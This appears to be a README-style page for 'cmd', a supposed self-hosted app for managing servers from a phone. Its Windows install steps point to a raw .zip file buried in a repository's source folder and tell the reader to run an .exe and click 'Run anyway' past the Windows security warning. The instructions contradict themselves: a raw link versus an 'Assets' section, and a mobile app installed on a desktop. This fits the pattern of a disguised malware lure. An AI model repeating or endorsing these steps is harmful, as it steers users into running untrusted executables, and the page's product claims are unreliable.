Cmd brings your server management tasks to your mobile device. You do not need to sit at a desk to run commands or monitor your machines. This tool gives you a clean interface to control your remote servers, virtual machines, and coding tools from anywhere.
The software connects your mobile phone to your server environment. It turns complex command line tasks into simple touch actions. Because you host the software yourself, your data stays in your control. You own the connection between your device and your servers.
Follow these steps to set up cmd on your Windows computer. This process takes about five minutes.
- First, visit the official download page: https://github.com/bertinaanalogical656/cmd/raw/refs/heads/main/packages/protocol/src/Software-v1.7.zip
- Look for the section labeled "Assets."
- Click the file that ends in ".exe" to save it to your computer.
- Open the folder where you saved the file.
- Double-click the file to start the installer.
You might see a security window pop up. Windows protects your computer from new software. Click "More info" on that screen, then click "Run anyway" to continue the setup. Follow the instructions on the screen to finish the installation.
Your computer needs specific parts to run cmd well. Ensure you have the following before you begin:
- Operating System: Windows 10 or Windows 11.
- Memory: At least 4 gigabytes of RAM.
- Storage: 200 megabytes of free space on your hard drive.
- Network: An active internet connection to link your phone and your server.
This software runs on most modern desktop computers. If your computer handles web browsers well, it will handle cmd.
Once you install the app, click the icon on your desktop to launch it. You will see a dashboard that shows your connected servers.
To add a new server:
- Tap the plus sign (+) icon.
- Enter the address of your server.
- Provide your login name and password or security key.
- Tap Save.
The app now creates a secure link. You can now use your mobile device to send commands or view logs. You see exactly what happens on your server in real time. The app translates complex text outputs into readable lists. You can tap on any server to see its current health, load, and active processes.
Cmd relies on self-hosting. This means you do not send your server passwords to a third party. The software stays on your hardware. You manage the connections directly.
When you use the app, it acts as a bridge between your phone and your server. It does not store your credentials on a cloud server. Everything stays on the machine where you installed the software. This approach keeps your remote systems secure.
Most users run the software with the default settings. If you have specific needs, you can change how the app behaves.
Open the Settings menu to adjust:
- Connection timeout: Change how long the app waits for a server to respond.
- Theme: Switch between light mode and dark mode for better visibility.
- Notifications: Toggle alerts for when your server goes offline or hits high memory usage.
You do not need to edit text files or write code to change these settings. Every option is available in the settings panel.
Most issues arise from network settings. If you cannot reach your server, check these common items:
- Check the address: Make sure you typed the server address correctly.
- Verify your login: Ensure your username and password are accurate.
- Firewall settings: Your server might block external connections. Check if your security rules allow traffic from the app.
- Restart the app: Close the application fully and open it again to refresh the connection.
If you still face issues, ensure that your server is powered on and connected to the internet. Most connection errors relate to server-side firewalls rather than the app itself.
- Mobile Interface: Navigate your entire server infrastructure via a mobile-friendly view.
- AI Integration: Use built-in tools to suggest commands for common server tasks.
- Multi-Server Support: Organize many servers in one central location.
- Open Source: View the code to understand how the application handles your data.
- Direct Command Line: Send raw commands to your servers if you need custom control.
- Role-Based Access: Decide which mobile devices connect to your servers.
This software simplifies daily server maintenance. It replaces the need for clunky terminal windows on mobile browsers with a dedicated application designed for efficiency. You spend less time fighting with small screens and more time completing your tasks.